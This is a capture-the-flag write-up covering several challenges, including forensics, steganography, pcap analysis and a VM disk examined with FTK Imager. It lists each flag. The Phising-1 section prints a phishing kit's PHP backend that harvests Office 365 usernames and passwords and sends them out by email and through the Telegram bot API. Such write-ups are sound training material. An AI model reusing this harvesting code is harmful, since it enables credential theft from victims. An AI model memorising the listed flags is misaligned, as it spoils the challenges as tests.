# Digital Dragon CTFs
## Solved by Raviel
### Misc
#### Phising-1
The challenge gave us a link lead to a website.
After messing around I found that when I login with gmail its send me back to google.com
after checking its subfolder/path with Dirsearch I found a backup folder
Download the onedrive.zip file we got the source code of its
```
<?php
include '../email.php';
// Generate a unique session data
$data = base64_encode(time() . sha1($_SERVER['REMOTE_ADDR'] . $_SERVER['HTTP_USER_AGENT']) . md5(uniqid(rand(), true)));
$_SESSION['data'] = $data;
// Prepare form data
$form = "**Office 365 Login Attempt**\n";
$form .= "| Username: " . $_POST['email'] . "\n";
$form .= "| Password: " . $_POST['password'] . "\n";
$form .= "| User IP: " . $_SERVER['REMOTE_ADDR'] . "\n";
$form .= "| Browser: " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$form .= "| DateTime: " . date('Y-m-d H:i:s') . "\n";
$form .= "----------------------------------------\n";
// Prepare email details
$subject = "**Office 365 Login Attempt** From " . $_SERVER['REMOTE_ADDR'];
$headers = "From: Digital Dragons 2024 <your-email@example.com>\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
// Send email to each recipient in $email array
foreach ($email as $recipient) {
mail($recipient, $subject, $form, $headers);
}
// Send form data to Telegram
$data = [
'chat_id' => $telegramID,
'text' => $form
];
$response = file_get_contents("https://api.telegram.org/bot$telegramTOKEN/sendMessage?" . http_build_query($data));
// Redirect or display success message after processing
header(""); // Replace with your success page URL
exit();
?>
```
we can see that its send victim information back through a telegram bot using API token
checking the token we got the flag in email.php
**flag{227de24c5e70d582e1cfecb1c57105ff}**
---
### Forensics
#### Forensics-101
The challenge gave us a execute file but its seem not to be a right extension or format checking with file in Linux we see that its a PNG image so just change the extension back and got the flag
**Flag: flag{6203b09fa1b624c6aa627d6108544686}**
#### Log flood
The chall gave us a iso file extract it has alots of folder and log file
the best way to solve this is to unzip it all then strings and grep or you can read it but it will be enourmous of text.
You will see a suspicious Base64 string decode it and got the flag
**Flag: flag{ab0d215c26354bfe02302c3beac879bf}**
#### Email
**SORRY I DONT HAVE THE CHALLENGE DESCRIPTION FOR THIS 'CAUSE I DIDN'T CAPTURE IT WHEN SOLVING AND THE WEBSITE ALREADY CLOSED**
The challenge gave us a EML file, so I will open it with thunderbird
After messing around with the pdf file, its a corrupted file or its may be full of garbages inside
but do you remember the flag base64 encoded? its "ZmxhZw" do you see its familiar? its the picture right at the end of the EML file
**Flag: flag{743cd9316bb1ded417574643e3839737}**
---
### Stegnography
#### Steg-basic
The challenge gave us a jpg picture, string it and got the flag
**Flag: flag{b666cd2bbfe773ea854948d9b77953ac}**
#### Steg-revised
The challenge gave us a wav file and hint that its relate to LSB so I will check the file with Silenteye tool
It return nothing I will have to write a script to decrypt it
```
import wave
song = wave.open("stego_audio_LSB.wav", mode='rb')
frame_bytes = bytearray(list(song.readframes(song.getnframes())))
# Extract the LSB of each byte
extracted = [frame_bytes[i] & 1 for i in range(len(frame_bytes))]
# Convert byte array back to string
string = "".join(chr(int("".join(map(str,extracted[i:i+8])),2)) for i in range(0,len(extracted),8))
decoded = string.split("###")[0]
print("decoded: "+decoded)
song.close()
```
**Flag: flag{464cb8f40278b7aafc98d931e50a5021}**
---
### Networking
#### D1 Accidental Breach
The challenge gave us a pcap file its contain 270 packets
going through the stream eventually you will find a conversation kinda suspicious
**Flag: flag{f88e05cbd53f00f6090be0e153680b2e}**
->***I wont be writting the first challenge cause its just ask what is "IoC" mean lmao***<-
---
### Boot2Root
#### BRT-1
**AGAIN IM SORRY BECAUSE I DON'T HAVE THE CHALLENGE DESCRIPTION**
The challenge gave us a ova file, open it in Vmware you can boot up a Vmware but there's no password and account, there 2 ways to solve this challenge.
First is we have to climb Root but in this case because the challenge gave us the whole VM so there is a Forensics way to solve it by using FTK imager.
add the vmdk file as image evidence and there we go
Dig a little bit deeper and you will find the flag
**Flag: flag{2991c9c5a7e497203de318897dbf1970}**
**By the way, shout-out to AnhShidou for this unintended solve**
**Thanks for reading (')>**
Sign in with Wallet
Connect another wallet